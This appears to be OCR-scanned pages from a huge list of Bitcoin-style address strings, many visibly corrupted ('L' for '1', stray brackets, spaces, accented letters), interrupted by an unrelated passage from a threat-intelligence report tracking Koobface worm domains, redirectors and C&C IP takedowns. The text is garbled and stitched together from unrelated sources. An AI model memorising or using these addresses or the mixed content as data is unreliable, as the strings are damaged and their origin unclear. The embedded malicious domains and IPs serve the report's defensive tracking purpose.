1BSVEjnwgQ4Gw13LbgyYfxXxEMnEen57DnyY 
1BsvfnCoe3iuESFAYUhVZ8s66rxJa7ru2n 
1BSxpehZBYYe9FKdpUFz3ubesJ5TY3jZg1 
1BSXPsnLot88N4kuvus7b6dB4tZH1AHGvv 
1BT4TgmuHaokskyZiaDDaqgjLEZgiRGtUEd 
1Bt53z2hFMDBUDYZHMK8XVFjd3LPZYT5Si 
1Bt5QVkbdcbJ 7wQHDhPYMJMjuo5ircf7iw 
1Bt65JDXRa9zjUXwaqf]w8CSXG5ngegNhgS 
1Lbt71dipJGFt4GwJ4DCY78HjHLNF2Ukg5 
1BT8vD5Hx757S9XgbE3M4bT5DKKQy9Sfv6 
1BTabpFxjjrGUkXZYPPcEsasTdQB5ewVWy 
1BTaF6aTXhz1MxrPbwTfbkk8pYZ697M12C 
1BTcA3gNCpQBaJhARmjyyVQSj3geby9uTZ 
1BTcGrLWSFB3teMPeFfiSkYtayixfpHFnG 
1BtDcJw9a3yeFVHWMLjkKMXEKzzLaeAPnRd 


25475 


LBTHHvPkk3ZVddWpDueqcXvEIRjninSnwT 
1BtHLYRi9vudGzZ5FbKYo16XvaZveYUYSdW 
1BtjpCrZnhyc95ZHX4zu2UP2gb57f2Bb3q 
1BTK9b2LAS38qxnn4CuC5fjKLPEMtR9Jh5 
1BtLYyd3xnbeDRADWRDonxXkKdpisMExGzo 
1BtM6oNuvKReQNISHfK20ZhCdweC8knuW2 
1BtMsRT3jCswsmdMiw16B9691Uhn9KZQI1r 
1Btnneg3Tyglwg6VQZXXqXxTfKFeRrYQRg 
1BtpgJP35v9QwgEtPcKvVLs6Sc2bMD5UpA 
1BtQCZgjL8ysrstULZQaGJ56nSikPa3mMb 
1BtQmstbndy5r4pBddwrd66k6q9HLckocA 
1BtspCYxtnNnpRSTpVfEZh7UACCWURvfet 
LbtsQtXx8q1TEqKVyFKbz76MKZtsBMTqkL 
1BtuWegkMdjzSo2qQ9q7n7BXGDAGKkDcKkx 
1BTvxBExMi3yEUFP5UgHcXdeSeG7WLH)Jtd 
1LbtxC7s6yUSN6mbGl1cozydQ5eh9zAnNbm 
1BTzvqfXdonSScqAvyqvvuRkf9gVAw8byy 
1Bu21boPWLJYxECz3TcEHSHk7tVgwTnZzQ 
1BU3ho0edXeQAhdGQMu6Z5zcZKS4rrh3Uk2 
1Bu8hkdDQQ7s4mzQumbD6ZtacjpkYeqUd8 
1Bub3nMT85fU9BAYr5xeHFd8kAJtDchEtE 
1Bue4SwXawEhVCP4G3L4adGkpTMQ9vodrf 
1BuEfGRHpSjNJjtwyZf31DMLG9uFhjPWM6s 
1BufnkKK423NFxFgNEckCsgWbG3DpVkV4Mw 
1BUhmfaqQUvLLhkYcfCF 7csLLx460ZgzZd 
1BuiQFaawEaTRnaL7pa4qBTj355cRcnaDH 
1BUMeyb66WWsjJqx1rAezj6mRjgsVPtngqc 
1Bun6CBcQégnfxkfXk1YJjKdNXLuwx9iya 
1BUNyFLAeTBTH6u7nNV9E7pcEvKeatZMzp2 
1BuPcUXaDel1qB4fY6GgPgh6WSidSF1NBE8 
1BuqwjiWFz4sFwgoZDDxPUTY3NZQDDipjq 
1Bus6qbW1F3eFaziZCLUbemBy2iYV8hKbxX 
1LBUSjnNEpTxfQrtAufZwL4BY4uiXvCsNNx 
1BUSrHEE9yJ5pgM3HLgBAfzj1QyeLeGrPx 
1BuSUStgzJCncUvvANMiLMridUUyv89j2t 
25476 


1ButakhnBvBd717DZ47SJon2rdggqatQZo 
1BUtgZCREfP8VWxKeaGk6zEeS5nuhZnZcu4 
1BuToT 7PHGX3zX6QZiVmdDtEcaQhSt22DB 
1BUXKUAMr368RMZo5im4brNrNnt4rgVkoc 
1BUxPh5SxzSNc3P929srQ11hUpKBrxy6Fv 
LbuycnMNjgtGwce9qag4T LigXZhtedPgC 
1BuyUPjA7jsKRBhwwaAgxoPMp/tspiT XbS 
1Bv13x9gRJ2wBkhqt8K9v8EHEfbiQZBqs5 
1BV1zwqzUyR77S9yz9yWjpLkrVHpR8ECRp 
1Bv5iSoC2tBzBCQu5geSvZuxSijGFJZtgh 
1BV6Hb6efgvL8WYRkKZbJQDAWZSSgsYV1R7m 
1BVawcwHQHuaNaEKH8pyRDYcua3RGk7inB 
1BvBCRFgyDw5mFG6Q4bJ8jxzCsD621s4jv 
LBvcNji8BDpVRUJgGMP7432pJ2TpZBCgszh6 


1BVGC2sRV9UPIHPHNVRPM6UWKK5DH10oW9L 
1BvgDAQSVuxXQ41DB7XFlakKnoB3TEkaQm5o0 


1Bvht4sn78H3kLIicv6h7m8go8ZBek9XdXr 
1BVHxnVeU7fCbhR4UwfV53PfkKnDdqrqxZa 
1BVjcLCcCKMU4U3HJQ3aZUKYtBfhiA41835 
1BvLhiLHgqJZoyCuCyGhr6Jy3FwgbBE9QmC 
1BvLZUP7Jrbh6d3f1znxubFAYircxH8hTc 
1BvM9d3m24cFn2dfD9fSAKWpUENLWNvNdf 
1BvnDaAvRhnLJ3fLMNpXHUFPfVgzq4Be4 
1BvNgj LHcCXAAP9C3dTgrDEG5G6y4yeeLb 
LBvNKQEBxqkKh47GEWEht9u8wSczGt77aSC 
1BvpKHceemsEKTYFd3Kz7z6cZAV 7squYy9 
1BvPSTRPAUW51r7eqBAP2PbkGiDyKnBr1Q 
1BvULyb3j898zZWaZ9x2bu8f1lp46pg3cq8 
1BvV9YxZ7n8LGCHKE4HsVbLRs2ySjBrjDV 
LBVVWJYs54nnjJRqUSYjKjnSLXV3P5g3nSK 
1BVXmtunLgXW594jvUmCasfuS8LopqN4gU 
1BvxZpsRPATVZ537FTutokRoLdopVHrSQc 
1LBVYfujmP5ZVr8NN5P8dvK8kUY1EUrFvof 
1LBvYPY6KSGp]7jghQDL7vEVxVfMexXK9ALb 
1BVzarUg3HEaQJINXMn165wXDS93AkwQ6Y 


25477 


1BVZd4LUBE36400j8x2kKTNxH6MJNLPH1VZ 
1BVZdXPa4bMcaEytkgQrydkNfSEyEkb5BA 
1LBW1ciqVZJXawMqTNZfRf4e8xsXDWRPnZr 
1BW2jmRkbaojHPvzzZrgAWVGiDC2Kdpugz 
1BWa5gAxzPb5Nc4ZVAgEjbeqFNDvrqdGDP 
1BwA8U5ReS8C4K733mbtwu9Gag37pikZE4 
1BWAS90KR5TaFpnExhVi3vxSJeUmjyHc6o 
1BwaTYf3F8yqnpqKvN9CJUix63Htv6EYeXB 
1BwaVppbGysQXQqL53NWX6DsZuUEC2D2Ev 
1BwbuBzu5ya7PEa/7tCeBZK2K1e6BcixeB7 
1LBwDCmJ8LxzSxz67nFZiKDtUVZcPFh2LNF 
1BwexmY3Ebr]2rL2p1TGtodBAhgABTdfiz 
LBWF XcQnztk9417gboPmHhfdkffenKbnwy 
1BWGhbmgURT5S3n12pvKEUNgeFkrtjg4t3 
1BWi3a6FZvARdzPpBEf8utaBYMriDb61jK 
1BWj4nE9uxkF1pWUoBneYWEPsugDM1Wfxp 
LBWJi673rLMH2YGzncG2pt8ingdw5Gekyn 
1BwknQgBUPGXbc7GnPrscdyoYqHieZvEAk 
LBwL4EZ5X1Y5fMhFkmn22aLlybrjT1cEhR 
1BwMsrpT8pQqm38paya/6acNmCFbS7JVdE 
1BWmZgLBVFnMvZwf4JSw5q5vvrHrVmLBL6 
1BWo5PFqVK9CG9UqxMP6eNpWc2CwnNH6GP 
1BWradeKkP5C416Ua7nZxX8eDvStTdr2CtG 
1BWrdQ397U4N4AqgRJhS6dCBiXUMtDa6gkp 
1BWrZzTzBXJ2J8URaE7DAucuuz4eXkAhUc 
1BWS5xd4R20GR81AsdTRJ60fRG9wJudr2g 
1BWS9BydGqHdcV692sEcs7i8s6qkL2b9Z} 
1BWscRSS7id1kuXMpkONBJRPVph2xHZoah 
1Bwt1lKXRa2ApTbaKmPV3Af9m8Ff6hdjafg 
1LBWT9AaJ4KHHQZdNV7wpKdkKVXgPbjT979 
1BwviUi9UNz5JPhhcqpjYLNQBDzZDw2QUq 
1BwvrQLtkFVdptA3n5gui3zXKzHXe5s644 
1Bx2sdtyxNarPNvonjFZQTjrAFMgJ3e4E4 
1BX3f1UWWT6UrknUGi2LynEnbHk1BoHFxs 
1Bx7KD3psboDWWsxLyTcquyEQMjFuaYUD2 
25478 


1BX7TDbeNNPuoVz93b1UupjJLBVYh3dic9c 
1Bx9tWoRKk2SvXZ5mBYZdqujeYhj69t5zqP 
1BxAGw2Tk1KTDCk8wwSNmSzl6vmKYEpEas 
1BXBn3qew5eDgQFYnkr96Je3PvfepfxXXpB 
1BXBwCuUVAtDg2Qm9UbEA6wVFiTZ6pAqrnv 
1BXcEPMVxyNTSrNUxbXi7nAmyrXxJaE3j54 
1BxCku8wP4zkK5bcDcwndcgWé6tDu6HAJCZ9 
1BxcqrSwUSXynVHPo3MWNBWQqmzzrXx4ai9 
1BXcWaeGvTkL4ZdwwF qnfxXhzApNtRCXk9t 
1BxEwLHiRbk4CnoalafvFfmad1JNnV6NHs 
1BXEXHCw8HrWiggnrCdtxcvbFxhc1NxS59 
1BXHbfZPVL8wKU9SWbvPNWMn8stARjKm3VvC 
1BxLTnj6XAvQtahisYA3fp9CW82p5pRVg9 
1Bxm7wy]Jg69)cxfGNNo7c7TXVDKRnjJfjYx 
1BxXNGHKDqHRYUMWFYZr8z25L8stGD186Qh 
1BXoTMAmWvnU98cEjh5YbeG3w745b5ZQMV 
1LbxPcWrvHBPjs4e95i9KnDvt6wgQr3BfE 
1BxPgUiubrtBw5MtBg6ZPAh22WnTnzx3Z5 
1BxQ4bUJMVNPsRG7YsV9KczL7BZVgzDqjR 
1BxQW7Y7w7gMyUD2dBrnLf5cnWRXxVFxJ7 
1BXT5mMDV5mP1HQnBWG25QTNbJ8KQn8ckVc 
1BXUfw8ChuE44DuJc72QRsrM5gN2hb7rNk 
1BXvucZt2vL8km7JkWVt97rusrGREJ5BP4 
1BxwGSBEiw7YzXPXXCw2tmqwWp3zCVXBzj 
1BxwU5wuP1ur1l39AbuBLQtR5rho8ybDdt6 
1BxY551WTy33UaCWWABDbELhZFzabepPLTB 
1BY6xWghSto32pc5qkcHXa4mdDvB4y2Lsa 
1ByCj32HyR2iXBkvDzjFXr68FZ5Ejjo288 
1BycppzErArdFnSdRFBcVqnyF7Hn1p/75ao 
1ByEDzK3CdBg9jrn5jpebbvWyRn8W6CFPR 
1ByjyrL5tySmVwb7j5mzLqvjJrRUgdygE3 
1BYk8REZjbf89fVmsZUKUaNohYUGE5BwT5 
1BYkJViaxWyNJRT9SQaly6Soa8SrZqryu 
LbyM9dmwX23CMdnA4urxFYjh3Nnocfqng 
1ByMqMNFwW4ukKksuVcJ2ikmRTyjWPVnKXm 


25479 


LByoT4NHGwPXyUPPJqKr5EJxamPntyUCeb 
1BYotzaWFFWZ38v3eLZuvAZEVLB35SmFbd 
1Byox5Rh3nU4kfhQNEh7812QQDsGdBqd86 
1ByPEVp8dvrodhot49SUhwVNBxb4FnFQRE 
1BYrJPx4b4MPXFCsGK1lidwbrAPuMpYeLSm 
1ByrmYULTyEGHHKFtUGABEKT8MgaCe2qtY 
1BysDVQBM1MwHz29P9TXxSNBH2TKGqVfqBj 
1BySnyWqZxchiAqQv8GgB8gxkUMkowE4AJ 
1LBYSXz5kz7xv3XQtfvEyvt6fJgL2dBJP3A 
1BYtBaTsyBCKYe7WbZDVpQodZNyUQ3X6k3 
1BYtRveGEANSMNMCQkQ9VHZ6Y72fysMg3M 
1ByWtm4mbic846xt7 1lvbkRqJP9nJjZGhj 
1BYXbvVN/7f5svjKHfQ5LCjYo2rN4RCnaNS} 
1ByxG7zG8zK65Z2WLYN8Jq7DbkAKE7cNavm 
1BYxytsqmQvMAJuShy4TQh61X3fqt2HFV1 
1BYZ2BSjzec2 7qMhFCpFp9BN9rwETqGrFm 
1ByzdfT4N16FuvGTLY26N1tpF6VX94KQup 
1BZ4mAVTVMY1b7doSyLN75HRLKEMmKseDr 
1Bz4x2HwmEF9d7h34kySoKDRDm7YbkBHP8 
1Bz5XDFUZNAMdxQAxFfgeNWbfaYkfkxdaj 
1Bz8ZGRBeZDAphQWejw78tfcapopKSFt89 
1BzZDHFMXyHw4RZpXiFApNZM8cgMSx6tnKY 
1BzdHv7R7ZL6rmWh1BnP4x5Faqqhaqxn2G 
1BZE7Zkt1kYUhVPsxhB3HcWbgPP]vG5jC7 
1BZED7EsSGSETHZaj9C3Xar59yw9i7qQ4jj 
1BZf2sgqZnrGb4xXU5gWA29LUwRWMCwo6s4 
1BZFXuMYVE9ON7zpJtGZVorjBR5XzQrQxNm 
1BZh5HRV12KaFK1pmcerQnMMpeMtS4rS1lu 
1BzimPFQ1h2U1xuajk 7eaBaFChzxBHGydM 
1BzKdkGdCFKrGvEytHcGVJ7j5sYtLKsmrG 
1BzKv5Hlya6y9WEtgrBdASM3B1tNBLaTYc 
1Bzm5pYeaCcbiurWE9DtNrrF6YGfyrDVqm 
1BZmU5zqsJGCWagcAH6v7vMcVfxTH56QaL 
1BZNMEw5d9UTcLP9cFpdUy2Bo3AGzxLUY3 
1BZnvZ2vs9vqxAhNET3aHuwGC7nF2kKHL91 
25480 


1Bzq849VN6fZQiIHywWR3udToYxS9qFjcyt 
1BzRrM1P11GHGDVJMnMuR8QBDaiQMkgDhh 
1BzZSUZBWjpRbwjEalbVFMsnbwus3tN1LZR 
1bZU5kgelb4qskK84TeosRTKMAciGTnQsU 
1BZUJ4tHUvFCsaeSyC8jBeZF89EKduPnH8 
1BZVFRQW4LT2EDrbapWYerLpYqCDxitZTD 
1BzvhmkSpB5SDh3SpN1ic2aBhtQeSdHphgq 
1BZxrY5UvusngsfqgDoOHMLWx2GxbN9J33ZF 
1BZyGH4CPg61neFcDUEMLTuSSa5x8XwWas 
1BzyZNYMZ7jfzqR9BRsVNsmgSw4qA9fEZb 
1C13VCghRW5o0YPZiquo99ATUZznjvQq85VFf 
1C1AkrK2Qy4ZwgJsukhxwk]2eWEUGtqSGa 
1C1B3yAUZi48raQuBgZcqZP95BmTpTtz8p 
1C1CTx7FZM1HKeqjWZyb6VAsrSd6bHRxT8 
1C1E3btza9WBu5ZAPhhTVX045DNWCFCjSA 
LC1LE5qw1lhHEmTm5hEjijPeL59QJD7rjH2P 
1C1f2M57vKkz1LXNcsdoWJtu2Tqy5iVx4B 
1C1FLqKjEEyB2QLU9me6AxGLweDG1n2Jc7 
1C1GjHc4euddNQ1lvq9CHnd45qKynFDonaKk 
1C1kVkmMRHGmL7sYMfCzyoGPPwUHUmztAek 
1C1MASeKcPCcpLAdXRwZhGhDY]2g8gXjeQ 
1C1P85zBCsfkuRtQnJFFsSLA3ijp5geTPwN 
1C1TCi71raLkCSq6JP5DJh2Z1cPgnuxVuC 
1C1VUAKZgqHCZScwuqUK18AMD7aWfh3qFF 
1C1VYoVolvrmvzPVwUGxXBtLNHUVLjjYHf 
1C29wjYCdgSJzzpugisGmLZSMUPWUKTpZn 
1C2A2vXvb8mCQoyYfxXcaKkcsJRrl1bG7kLnN4 
1C2cpWTKN3KoydfL2FifAhhQNWZKfCGqF8 
1C2mi7syKmPtwLr3ENtwDdMZwAymNMEX8K 
1C2U3Cu7HYGq2yFVvQB lcoaTqUpQiaYHNk 
1C344rwoQzkKHsnzfN7XzPdohQkRWJXQmq 
1C35kMn7iUAkCR9VYpmrWMrnzrYil33Zcs 
1C38n3gusmbCMDCfUKNUG6QGxtmBRT XgFt 
1c3cJMi3CaR7KdcuG99cXVB88chGzTmiy 
LC3EtY11rWc9dB8E7Ww/7rF3jk8M3iiVQcJ 


25481 


1C3HC)wk68xuNWmoxXp9EtjbBkWpc3mMKMxU 
1LC3iIMt5vn6YbC3 1ii4jPMx91luiw4HrGS9 
1C3Puofum8qAHuXnLyYEfdirxok5uzdW47Z 
1C3sw37makucGgz9HP3VS1t23xTP8Kb6iM 
1C3WuXilsX6vLfdfHnSEJGn7rukGhrMov5 
1C3YeMBuRE2z36WhQeZg2dQb5ilwcVRg3y 
1C4Aso6wbjNiDTLMUogxM5r12QXKoVn7ZX 
1C4dC6ARZQMx6Rq2hskT4GxxGkT Xq5zZn5F 
1C4DD4Uzast5jLALkc22vy8TVccjbeRMkt 
1C4DuhcRmEFRhrYQjSVCAy7SymuTNLof4y 
1C4EDQbaBs2V8hq6u4uAbBeMgpGV8QHPmf 
1C4ehC4LZR3CqY)JXNzZDFrosaLtUVB2HUNkm 
1C4VGroHuh4TGaf9veVPdYhQ5pLcWbVPd2 
1C4wG3LusjeKwCpmjqn3dWSiJpRhxw2RWe 
1C4Wn6r7mMHCm7wYeHEULUXesetoyqxhxXZu 
1C55sGRgYucxzcl1QwaNbs8FJeZc1R3q9We 
1C56zyUDjozfuqUv2Lp8ZvGZEFfrspeWwaxX 
1C5cQXJRfMrUDGmgPK7SdJVEidbGPZR1RY 
1C5GZ6HeV8ENP53ch63zp2FSqWwSsoyckeQ 
1C5hzz569N1V1YnibXBjYg2rBZyFEMRPh1 
1C5PJXUoolMQXZYh30mz7Zdig49xXtoZhMd 
1C5rjnfoWEKG6pr8bF4beH123m8JTYywzr 
1C5ssb32nSLWPXb12MqsN9qdDdxhCFjPZ1 
1C5x9rRS3DGaeE1hq2D6PyEf4uragJBirm 
1C5YM7ystsQhPTy4UVw9Zfhx1CACDPXWbp 
1C67q2sHjYK2YAN4CYtc1NvXcUzxWzU8TD 
1C6bquFvLRruHVcqMy2uwCvul8ss]jHRZg 
1C6eZwGPgzEFgxfcAxb8JgJUNKAW6GAWYb 
1C6fawur4smMUWEBKbiCF 7DBmoc1Nv7gmdH 
LC6fEEGHmhgQQK83BWsMQ5fNLoC7rtqwPk 
1C6jGBSn8dPyS2VustVGEjbpS9xwn2kxXDW 
1C6kYZMe7P5VvS2wDqVkwvcrNjqfp8nkGt 
1C6msx8Ms5metN6txHSz7FinYHHsKYYd2z 
1C6noVE94DUNSOLWNQ6KgB8baqjFMw94NtJ 
1C6P4bRztPCLeYcKBcLojUzhw5bfavScGK 
25482 


The gang has also introduced a new domain, used exclusively for Facebook campaigns - 
zadnik270809 .com - in particular zadnik270809 .com/youtube.com/w/?video which loads 
zadnik270809 .com/youtube.com/w/ups.php and redirects to a well known Koobface redirector 
kiano-180809 .com/go/fb _w.php. 


Zadnik means a**hole. Domain suspension and IP take down are in progress. 


UPDATE7: Earlier today, TelosSolutions confirmed that "this customer has been removed 
from our network". Great news taking into consideration the fact that Directi’s Abuse Desk 
has also suspended boomer-110809 .com, as well as upr200908013 .com. 


The Koobface gang responded to the take down action by once again moving to China, 
[6]61.235.117.83 (China Railcom Guangdong Shenzhen Subbranch) in particular. The IP has 
been taken care of, with all of Koobface campaigns once again in an "inactive stage". It’s 
worth pointing out that kallagoon13 .cn and allavers .org are also parked at this Chinese IP, 
with [7]both domains clearly involved in [8]Zeus crimeware campaigns. 


UPDATE6: Following the 24 hours downtime, the Koobface gang has found a new home 
online, courtesy of Telos-Solutions-AS/Telos Solutions LTD, with an ongoing migration of the 
Koobface C &C and campaign domains to [9]91.212.127.140. Take down activities are in 
progress. 


UPDATES: Oc3 Networks & Web Solutions Llc abuse team took care of [10]67.215.238.178. All 
of Koobface worm’s campaigns once again redirect to nowhere. 


UPDATE4: Koobface has been kicked out of China - again - courtesy of China’s CERT, 
and is no longer responding to 221.5.74.46. This is the second time that [11]the Koobface 
gang is using the same IP for its central campaign domains, clearly indicating an ISP which 
"reserves its right to offer them services in the future once they stop receiving abuse notifica- 
tions". 


2551 


1C6qbk8XSSfcV5DDsnFVq3X3NrrojCMJkZ 
1C6RFzuV8fSr8faE3WW8b919KbZa9ExoDk 
1C6SifVSUNKvAubZ7MLpaLyLwkjRweaEXo 
1C6skqfoMmG44akH9HLV8KaQjeBvzi 7MMV 
LC6OTEVN8dPNQVTAs4zBurbcTvvYeh8GvZV 
1C6thR8Ze8U919aS7UAhIit}sSK2ZMDQWFL 
1C6uzs1GJE7xoUn7NJe5jEwhqEJyiRKPpi 
LC6WN9MXynnfUgqrlmbajJPA1Jn1GhrBjJZRr 
1C6YyafTWwCK4jC8FRCCdtWMPs2WB]Jdp9M 
1C71MeDA8LCt1VbgCrmcicYBoqpRvmVDz] 
1C7766tkfjJvF8yACoDCKXMEMzhSwjJtXVPQ 
1C79X1G6qNaDKkesSfch93SzJMZFE6sDfd 
1C7A9AanmhE2tjCbWaKbyx8aLkBhHCDzGp 
1C7BCqdS9JLz4pUCfkCmkF7PYhj78nUtxQ 
1C7Dmstqfezydgxc8YxxNsF8fjB5AR3JhQ 
1C7EM6udiLbwdjGqfA82UUcxNEmx7abywg 
1C7GtUBVkngTDjadunAfv5S3WK85x7Bn1p 
1C7HhrongsvBFG8PsbprGu6ybJ26KQQ3TD 
1C7hKmaDJ9CbVjPtXLADYGoSEDWUP49ZP6 
1C7jy6QHMj2sFITEB4EVQxCsLuA55c9wwa 
1C7Ky3dHanHucT3sBdDctPi8GS8gktrfbn 
1C7mvK7PByMutGbAvGGZodiPtuTSqHdmXBH 
1C7pGb3vGbHGtx3fQWAg2 XA9krV1Gluabz 
1C7zhJWLbhBJByqxF3YwL8hkWeaXNLi8j1 
1C83U39foGSLdvPcubQFhrRjWnHjf6AM88 
1C84JHSYZQTEWQ98VWUUYWDWAgTZEXzIcg 
1C85HHHagGjUYrnoDbm6jFaWanWt9WrSDZ 
1C8A1Pjxciz7qSS6voPbAywKG2iRR1tnBZ 
1C8AcYpV2Lr5fngGZSy5cAQmq6vulWCfao 
1C8d9KyL5wRgFxvrPiioFyk19MHArKmkit 
1C8GpxSo3QBNtTeJ6JVy3gz5FTXD1fkVB7H 
1C8GrZiaW37iLU8Ued9Y4cm41kxV40jQZW 
1C8hGFUID5b78grVkNavpkK6vmdeCpLLLF 
1C8KUmy5DygoLKpiikrDMMdatGHoKkPtp9 
1C8mM4UXRnvuTeDhVsKaaAVvrt4DJv9tVVm 


25483 


1C80VpnqzfeRLUXh7vYKB45uMMKNJh5wsA 
1C80XDWuDLRuox8kN3KVDt2g1Uy6BCFsaS 
LC8pYxt8dNuXZPFJCVbxwnb8Zv3jtf2gJn 
LC8tRUE9FjeWrMyoFzJnujppMJNufdA1rZ 
1C8xf8h5Yxr3q1WA8j7YeTJDmdp4L6xRRu 
1C8y8gS Ta9iAa5Qq86YcHMDPfQJoWDvdXD 
1C8YkYmzFbtvNg4DtjbJ pnbLBJ29fyPvGT 
1C8ZG2BbnVk7XqT VCr2LpkvAFyuHDgNsUG 
1C8ZGGxPxgi8fZN4yLN2YNPxPnKepARUow 
1C95bkuLKMafAtVBuPkvGyCMxqjJVekB5H 
1C95y3PNfXZqG8tCX15R8dDTVakKgmNrxGa 
1C96cZdp241piaRyx4vg8EhWn2XkTqLj5H 
1C96sE037F7cee2kUXmhCpi67mnzJUjQQe 
1C98bcUM1LYINL5uYKonKXLKaMzC25tqATz 
1C9aJtkYXHHMV5UpDtSdzXgg8eQu3pAg5N 
1C9ARQCvs9JGbWpP7SG94Z2rywyjknra8U 
1C9Ax9Fa4gHxTcX9QKYJOHtTGVsdmUxi7H 
1C9buJ4dNo3EBtVoe2PA5Q2n7s9jR7Uqpc 
1C9GPyNWTduARnuRKGDGeq3s961k4VJckM 
1C9k7kK8CNTZAGReRhVekkzaTba9pZ5Tj2K 
1C9KA8hWUUASCdDq1EPB7PmcnFNghb1so2 
1C9rStQ8ZTxr2Poo6f67cqYNmigByswnse 
1C9Unk6LjWOMYUWESfkG7PDE4WCtup4gSG 
1C9wjqtrCyHCpLqSlfovwZtJV1L5hyjJKJL 
1CA5448dRw5ycGnEUh6Qj3HWHDyaSVXCFg 
1Ca7sBTjAckcKThznh8EEBqfUoYchXvdVL 
1Ca7XTb1JZYK89hvdHrVshFo8SB8vd2)JB 
1CAakKFd7FQseBffNEgzM7ulTnHzB8poxtTa 
LCAApxKMtnbbNvKX1nkaE2ebUFhIRfJdvq 
LCAAVLXigKSHyaRFH3ShcjoaJhaMvVb9dy 
LCAb4SAY3Wd72QaA5S16gxZF28eASbB62D 
1CaeP9LDLyNEvrktCuUnQp51zdf7cgZpPu 
1CAgbymvHhUkGjHt8goCQ9YnJwKNbzv1lwn 
1CaHh5sJkxtVed9cMjoweGUZMdmgqCEphsv 
1CAk2CAFtpz2TGei6HTtN9 7MvgqdE ToVnp 
25484 


1CankAvg3SWNn5CeUTFFUgkKUWN1VUWGNfo 
1CAQ5QgBEgFhXbkfz8dh8PYQ61GUNUKhCD 
1CaQ7SyRZKKSM7R7inNF9OxAszYgmorPcwE 
1cas3ASsA7QKUHDGPw29CM1DJn1K92vGcf 
1CaUdG5VZcEd92udwEsw81jznGNwvKWkKNT 
1Cav3SCF371tiJ9534j8ijtl1BzFPn62x3s 
1CAWeHcmkRidncFCUFXHmcMnEP9GQasizZ 
1CawSRCk9JDS6jCe8Tyh1KgtMECUAMUTQv 
1CaXurL4x27AGGN7BPm2kJpCpVWZFJtMTK 
1CAy2BDzn7uryz9rKBeNv4VmUcvedZPeud 
1CazKkKHELwRoCZuPSoZBQYKjyTMhhk4gfL 
1Cb2KdEcFZTAKhPjwizTloptUQ5nqUXTY2b 
1CB4k6MTjLLHS4gsGaADcWPVnxbEYJG7zP 
1CB5MFBw8hNLq7fnBAnYMXmCYwv8AyYCpnv 
1CBAAalmBapXW6M6pTqxXXDmkF1ZUEEPvf2 
LCBcxy1t1RBWahPVqPv4JEczorBFe7hSz4 
1CBepDMzfcfyW8QopEyGAbBox64sZGFU9ON 
1Cbf8wc8HXWLsxQ4jV2D66B90FC18fdpyH 
1CbFe17BfrT3iUa98wwp7pCxXvLDxjaedz 
1CbG1xkavWaqJsorQrNCFJ9VJY9mpz2be2D 
1CbGaVeXWM8NZmrpyTbtUKn6MMtMMU9y6T 
LCBhCGSMxAZt6hPut3sh9m 7JejJGk92ZRDNs 
1cBhd2avNauAoKJwWw4C1zSkMQpSRQQbH 
1Cbim6dMCcjbamm1AVZ6ZXGo4PoiLXEZ34 
1CbksjCSeU2W2ZWL9OCKk14MUFkwVpjWyX 
1CbMduL2BQTA7RQEpAKXRRRAtMdfyUHc49 
LCbNjVPB3LnavVcRv3FcjEtNWmi7WL3uY7 
1CBoQ4yoaaiuWjttfRGS6ETXZxc6YCNBFt 
1LCBPLXQZAXDfydn6Aoxf8WxXfaxSM]p408v 
1CBtKExFSKoePhBHuuEkSfr7f6R8qYJ4ik 
LCBtTKPfruZEtVqg7r2yCb48Cg8egRjjSB 
1Cbu5SBP2ThUb32JPSeMHLumE4UjRcXdkD 
1CBuE4Zq4kxRHpjjTGmpp3HdnJrS7pbbUM 
LCBWHHtyLs12PktUgrdA13Z2ZT2ao02trdq 
1CbZFeWjUZXjXzPC12M7cveX3Hu3nZ1bnr 


25485 


1CbziRhHP5Z6H4DhiSUKCXxL5CIHTxe3yFv 
LCCLKZMBG4hfpquQjk1CTv4WfKTfjciwBm 
1CC2Lzm7swbymDLES3UXdDWd8Mg8x4thsr 
1CC3peNqZRQCCyBGbWwLJmEDawTs3v348L 
1CC6cZa643NE4u6M 7ugB3Zfm8DEAektW1x 
1CC7V9SXKQR1H1DbQasfGKWmkWWR4AH1KR 
1CCBvho TuLwqYTbkNdntGESwmu7n8PDEd6 
1Cccn3QbGa9nY3KNW4D2xoEjNHz9j62btz 
1CCcrrvQvBxzEzWB2W43dcUQCDpuyWWUcB 
1Ccdc14223FnzTé6xJNajbZ1hK41o80fwGp 
1CCEkAvK3dJF6srepJ91QmpSuevdnxjJGVq 
1CCEQaPRavnoD9CAb1y5FV3er|grQ8E4DN 
1Ccf6A48WHHY 8HwWRmFAkySSyQQS9QWbIsf 
1CCh9YDRyRiJuqoMuL9e49NKMS82RJa8C3 
LCcCHNRSCMwwoMpMLyuWPQ3bQkFoghHLraQ 
1CcMKJarZtF7r7Kvsjek7wUmwBShtp2MDx 
1CCmzWtkrxqUuUA2czmEiCBFyKY1D4C22yMr 
LCCNbJWaED8mMUWAnCZmRZwtkwENpsxtxit 
1Cco5Q8B5YzuwmUgZjr31laZLck1jA5p23t 
1CCofvAiD6j3SpeZRJ 3wwwVUwébyovAhyYe 
1CCtRusEmzpFZHMnZDr265sxwNDUssRRoH 
1CCU5psvnVcDoFHVZ82W6cjcTTdAaCWeVL 
1CCuc7hReEDZPM8hbVRnKMtMncTD117yWt 
1LCcUjhWogojVj4ZmooypLuV9pZy3Qt6H18 
LCCVVbk7fL7 3rwPk9ng4CYYdhnMTsuwqdR 
1CCvxX6c9yxL2NSUFMxeS2myYas363jWMRH 
1CCwvZso5K9ndYj1F1iMcfSJ|LQ6ADGvdjU 
1CCxjhjEGWTbVYA8KEzZ8K9UV6CtZCqWHB8 
1CcyaNMLsTRjgsv87U95y363Lrksat7x4d 
1CcYTGyWVmoL9XX7UB4BxCFjkMucWLxjDR 
LCDIJoVZWNsscUxqCKYdLrL13Jnxy5Z735 
1Cd3uyQgM5o0dZg8r5kQNt6W55WiaW7KZE6 
1Cd5KXEdHBG8PfGMLF5kgGPfg3quWcmVr3 
1CdA6PowuQdYT9xDC17AgnquEnPC7P8dUS 
1CDaRGMAkoiSvgvwPRXxXdhatcijNKvs7bdV 
25486 


1CdBJ7gxGyMMPGvxTtPwr9wPUWHkKrXaieS 
1CddRG6twF61qs9Mr1YEuVqma6eiynNcYb 
1CDeN2XrdSLjtLzFhFvgZiTxxKid8XeNtj 
1CdfqecixS9eWGZZPZ7Koh1jS3VCb2T5cm 
1CdFygXmWFgqVwzYovvSqznVNjNHqCtMCQ 
1CDizpCLuQTZ1feJSQkmgGquosvEUQa9KQ 
1CDKHdFbsgJMM8NRVhMJA5NsU27qJKgsfu 
1CdMyM4xQXk1oHYriAMcuT2wCEdS7ZeBMx 
1CDonrdnspjRJ3rxkN85vdmFjco2MrkFCf 
